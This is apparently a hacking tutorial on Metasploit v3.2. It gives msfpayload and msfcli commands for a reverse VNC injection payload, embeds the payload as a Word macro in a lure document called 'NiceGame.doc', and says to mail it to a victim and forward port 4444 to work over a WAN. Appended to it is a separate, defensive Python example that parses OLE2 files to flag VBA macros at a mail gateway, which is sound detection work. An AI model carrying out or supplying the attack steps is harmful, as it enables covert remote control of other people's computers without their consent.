Hello friends, today I'm going to show how to use the payload feature of Metasploit v3.2 for Reverse VNC Injection. The steps are given below.
1) Create a payload for Reverse VNC Injection with Metasploit's msfpayload utility:
./msfpayload windows/vncinject/reverse_tcp LHOST=172.16.107.44 V > exploit.bas
2) Copy the exploit.bas file to another Windows system to make a .doc file.
Create a new .doc file, write some text into it, then do the following:
Go to Tools --> Macro --> Visual Basic Editor.
Then go to File --> Import File, choose exploit.bas, and save the document with a name, e.g. NiceGame.doc
Now the file is ready. Send this file to the victim via mail or by some other way.
3) Now in BackTrack 4, type this command:
./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=172.16.107.44 DisableCourtesyShell=True E
On the target Windows system, when the victim opens the file, he/she will be asked whether or not to run the macro. If he/she accepts, the connection will be initiated and the VNC client will open on the BackTrack machine.
Note: VNC does not need to be installed on the victim's PC. You can also do this over a WAN; the only requirement is that you forward port 4444 on your modem or router.
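Seen from the defending side, the delivery step above depends on a legacy .doc that carries a VBA project, and a mail gateway can detect that before the file reaches a user. The following is an added example, not part of the original guide: it walks the OLE2 directory of an attachment and flags the Macros / VBA / _VBA_PROJECT entries that Word writes for a VBA project. The function names (directory_names, classify, build_sample) are hypothetical and the sample files are constructed.

```python
import struct

CFB_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")
MAXREGSECT, FATSECT, ENDOFCHAIN, FREESECT = 0xFFFFFFFA, 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF
VBA_MARKERS = {"Macros", "VBA", "_VBA_PROJECT"}  # entries Word writes for a VBA project

def directory_names(data):
    """List every directory entry name in an OLE2 compound file (legacy .doc)."""
    if data[:8] != CFB_MAGIC:
        raise ValueError("not an OLE2 compound file")
    size = 1 << struct.unpack_from("<H", data, 30)[0]          # sector size, normally 512
    sector = lambda n: data[(n + 1) * size:(n + 2) * size]     # sector 0 follows the header
    fat = []
    for n in struct.unpack_from("<109I", data, 76):            # header DIFAT: FAT sector numbers
        if n <= MAXREGSECT:
            fat.extend(struct.unpack("<%dI" % (size // 4), sector(n)))
    names, seen, n = [], set(), struct.unpack_from("<I", data, 48)[0]
    while n <= MAXREGSECT and n not in seen:                   # follow the directory chain
        seen.add(n)                                            # guards against looping chains
        chunk = sector(n)
        for off in range(0, len(chunk) - 127, 128):            # 128-byte directory entries
            name_len, kind = struct.unpack_from("<HB", chunk, off + 64)
            if kind in (1, 2, 5) and 2 <= name_len <= 64:      # storage, stream, root
                names.append(chunk[off:off + name_len - 2].decode("utf-16-le", "replace"))
        n = fat[n] if n < len(fat) else ENDOFCHAIN
    return names

def classify(data):
    """Verdict for a mail attachment: 'macros', 'clean', 'malformed' or 'not-ole'."""
    if data[:8] != CFB_MAGIC:
        return "not-ole"
    try:
        found = VBA_MARKERS.intersection(directory_names(data))
    except struct.error:
        return "malformed"      # truncated or inconsistent file: quarantine it
    return "macros" if found else "clean"

def build_sample(names):
    """Constructed input: minimal compound file with one FAT and one directory sector."""
    header = bytearray(CFB_MAGIC.ljust(512, b"\0"))
    struct.pack_into("<HHHH", header, 24, 0x3E, 3, 0xFFFE, 9)  # versions, byte order, 512-byte sectors
    struct.pack_into("<II", header, 44, 1, 1)                  # 1 FAT sector; directory in sector 1
    struct.pack_into("<110I", header, 72, 0, 0, *[FREESECT] * 108)  # DIFAT[0] = sector 0
    fat = struct.pack("<128I", FATSECT, ENDOFCHAIN, *[FREESECT] * 126)
    entries = b""
    for i, name in enumerate(names[:4]):                       # entry 0 is the root, rest storages
        raw = name.encode("utf-16-le")
        entries += (raw.ljust(64, b"\0") + struct.pack("<HB", len(raw) + 2, 5 if i == 0 else 1)).ljust(128, b"\0")
    return bytes(header) + fat + entries.ljust(512, b"\0")
```

Matching on entry names is a triage heuristic: a flagged file still needs its macro source extracted and reviewed to judge what the code does.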
Original Video links for the above guide,